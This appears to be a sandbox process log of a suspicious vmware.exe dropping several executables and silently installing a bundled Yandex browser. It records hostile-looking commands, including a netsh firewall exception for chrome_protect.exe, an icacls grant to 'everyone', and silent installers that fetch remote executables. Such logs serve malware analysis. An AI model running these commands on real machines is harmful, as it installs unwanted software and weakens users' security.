"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4180,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:8

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe"

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

"C:\Users\Admin\AppData\Local\Temp\WTLDR.exe"

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

"C:\Users\Admin\AppData\Local\Temp\KLSetup.exe"

C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe

"C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

"C:\Users\Admin\AppData\Local\Temp\yadl.exe" --partner 418804 --distr /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

C:\Users\Admin\AppData\Local\Temp\yadl.exe --stat dwnldr/p=418804/rid=10b1d6f7-efc7-49b9-9644-adb9b1999803/sbr=0-0/hrc=200-200/bd=267-10639168/gtpr=1-1-1-255-1/cdr=0-b7-b7-ff-b7/for=3-0/fole=255-0/fwle=255-0/vr=ff-0/vle=ff-0/hovr=ff-ff/hovle=ff-ff/shle=ff-0/vmajor=10/vminor=0/vbuild=19041/distr_type=landing/cnt=0/dt=2/ct=0/rt=0 --dh 2400 --st 1719179731

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe" "chrome_protect.exe" ENABLE

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 305E3848A6BE4F7A292571F59A0F957F

C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe

"C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER

C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe

"C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n

C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe --send "/status.xml?clid=6035492-354&uuid=0805d991-6e7d-4048-beee-e5c45536178d&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A15%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A45%0A57%0A61%0A89%0A102%0A103%0A111%0A123%0A124%0A125%0A129%0A"

C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe

"C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --use-user-default-locale

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -version

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -XX:+UseG1GC -Dfile.encoding=UTF-8 -jar "C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Windows\System32\GameBarPresenceWriter.exe

"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

java.exe -version

C:\Users\Admin\AppData\Local\Temp\yb93EE.tmp

"C:\Users\Admin\AppData\Local\Temp\yb93EE.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\0de1d919-8e76-460f-bae5-959eaf727451.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=541385404 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{2830C1E5-8483-450B-8A59-CC558EB0D581} --local-path="C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui={0805d991-6e7d-4048-beee-e5c45536178d} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\9ed2cb0c-90f5-4967-8273-2b90a8fd393f.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=563454059

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe

C:\Users\Admin\AppData\Local\Temp\YB_970D5.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=e7ae39fa5eee477481dc83ee66f9242b --annotation=main_process_pid=19936 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x33c,0x340,0x344,0x318,0x348,0x1181cbc,0x1181cc8,0x1181cd4

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\TEMP\sdwra_19936_1205146255\service_update.exe

"C:\Windows\TEMP\sdwra_19936_1205146255\service_update.exe" --setup

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --install

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --run-as-service

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=e7ae39fa5eee477481dc83ee66f9242b --annotation=main_process_pid=17492 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x4ab728,0x4ab734,0x4ab740

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-scheduler

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-background-scheduler

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source19936_39465163\Browser-bin\clids_yandex_second.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=541385404

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=10208 --annotation=metrics_client_id=e7d2bece03224be8a7a2fb7118e369ba --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x180,0x184,0x188,0x15c,0x18c,0x6d065a28,0x6d065a34,0x6d065a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --gpu-process-kind=sandboxed --field-trial-handle=2352,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2184,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=2656,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2620 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Storage Service" --field-trial-handle=2860,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3036 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Audio Service" --field-trial-handle=3504,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3500 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Video Capture" --field-trial-handle=3680,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3916 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Импорт профилей" --field-trial-handle=4320,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4472 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=4468,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4488 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4188,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=uwp_cookie_provider.mojom.UwpCookieProvider --lang=ru --service-sandbox-type=utility --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name=uwp_cookie_provider.mojom.UwpCookieProvider --field-trial-handle=4480,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5588 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5812,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4028 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6024,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6192,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6092 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6420,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=2228,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4680 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5928,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4636 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5900,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6204,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7088,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7044 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6668,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4836 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

